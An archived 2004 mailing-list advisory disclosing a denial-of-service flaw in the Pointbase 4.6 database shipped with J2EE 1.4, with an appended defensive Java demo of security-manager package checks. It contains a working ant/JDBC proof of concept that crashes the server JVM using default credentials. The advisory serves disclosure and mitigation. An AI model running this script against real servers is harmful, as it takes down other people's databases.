The OpenNET Project
Proof-Of-Concept Denial-Of-Service Pointbase 4.6 Java SQL-DB


Date: Mon, 19 Jan 2004 01:25:36 +0100 (MEZ)
From: Marc Schoenefeld <[email protected]>
To: [email protected]
Subject: Proof-Of-Concept Denial-Of-Service Pointbase 4.6 Java SQL-DB

Hi,

the following code crashes the Pointbase 4.6 database that comes with the
J2EE reference implementation. It is provided as an ant script for
flexibility and to illustrate the involved resources.

This is a cross-platform denial-of-service java exploit, caused by the fact that
the pointbase installation coming with j2ee/ri 1.4 is not equipped with an
appropriate security manager, thus giving all jars implicitly all
permissions.  These unlimited permissions can be exploited by an attacker
using jdbc to crash the jvm running the pointbase server.

Unfortunately there is no policy file provided by Sun defining the necessary
permissions for pointbase, leaving the application server deployer alone in
the rain. And it is a long, time-consuming job figuring out the permissions
when starting with a zero-permissions policy-file.

A recommended approach to find out the necessary permissions of an
application tailored to the use case is test-driving the application with
jchains (www.jchains.org) and using this tool to record the needed
permissions in a permission template. After fine-tuning the recorded
permissions and starting the application with a security manager that is
configured with these permissions the applications runs in a confined
"sandbox" mode, which prevents attackers from accessing vulnerable jdk routines
like sun.misc.MessageUtils.toStderr.

Further exploitations possible are information disclosure and remote command
injection (tested on java/winxp and java/linux where I was able to start a
notepad.exe (win) or xemacs (linux) on the pointbase server via a jdbc
command). Further details on these vulnerabilities and which major JDBC
databases are vulnerable (it is not only pointbase having this bug, you may
remember the jboss vulnerability in 9/2003) can be read in an upcoming
report by illegalaccess.org.

If interested in more details you can contact me.
(marc[at]marc-schoenefeld.com) Also send me an email to get a policy file
tailored to the pointbase installation of j2ee14ri. Also feel free to
download the jChains tool and send me your suggestions and further thoughts
about it. jChains is free to use for educational purposes only, so you need
to ask me for restrictions for any commercial usage.

Cheers
Marc Schoenefeld (marc[at]illegalaccess.org)

======================build.xml=======================

<!-- pointbase denial-of-service by marc schoenefeld -->

<project default="dos">

<property name="host" value="192.168.0.7"/>

<target name="dos">
<sql
    driver="com.pointbase.jdbc.jdbcUniversalDriver"
    url="jdbc:pointbase://${host}:9092/sample"
    userid="pbpublic"
    password="pbpublic"
    print="true"
    >
<![CDATA[
//DROP FUNCTION CRASH5(VARCHAR(20));
CREATE FUNCTION CRASH5(IN P1 VARCHAR(20)) RETURNS VARCHAR(20) LANGUAGE JAVA
NO SQL EXTERNAL NAME "sun.misc.MessageUtils::toStderr" PARAMETER  STYLE SQL;
SELECT CRASH5(null) from SYSUSERS;
]]>
<classpath>
    <pathelement location="pbclient.jar"/>
</classpath>

</sql>

</target>

</project>


======================build.xml=======================

--

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
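Added example, not part of Marc's post and not code from Pointbase or Sun: a small Java program showing the gate whose absence the advisory relies on. SecurityManager.checkPackageAccess is the same check the JDK class loader runs before handing out a sun.* class, so with no manager installed nothing stands between a JDBC-defined LANGUAGE JAVA function and sun.misc.MessageUtils. It assumes a JDK where the SecurityManager still exists (up to 17; on 18 and later start with -Djava.security.manager=allow) and the JDK's stock java.policy, which grants no accessClassInPackage.sun.misc permission to application code.

```java
// Added example (not from the advisory): the package-access gate that a
// missing SecurityManager leaves open. Compile and run with a JDK <= 17,
// or with -Djava.security.manager=allow on JDK 18+.
public class PackageGuardDemo {

    /** Mirrors the class loader's gate for restricted packages (package.access in java.security). */
    static String probe(String pkg) {
        SecurityManager sm = System.getSecurityManager();
        if (sm == null) {
            // No manager installed: every jar effectively holds AllPermission,
            // which is the Pointbase/J2EE RI situation described above.
            return "no SecurityManager: " + pkg + " is reachable";
        }
        try {
            // Throws unless the caller holds RuntimePermission("accessClassInPackage." + pkg)
            // or pkg is not listed under package.access.
            sm.checkPackageAccess(pkg);
            return "granted: " + pkg;
        } catch (SecurityException e) {      // AccessControlException is a SecurityException
            return "denied: " + pkg + " (" + e.getMessage() + ")";
        }
    }

    public static void main(String[] args) {
        // 1. As shipped: no manager, sun.misc reachable from any loaded class.
        System.out.println(probe("sun.misc"));

        // 2. Install a manager backed by the default policy file. The policy
        //    does not grant accessClassInPackage.sun.misc, so the probe is denied,
        //    while an unrestricted package such as java.sql still passes.
        System.setSecurityManager(new SecurityManager());
        System.out.println(probe("sun.misc"));
        System.out.println(probe("java.sql"));
    }
}
```

The second run is the confined mode the post recommends reaching with a recorded, fine-tuned policy; a server-side policy would additionally have to grant the Pointbase jars the permissions they legitimately need, which is the part this demo does not cover.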
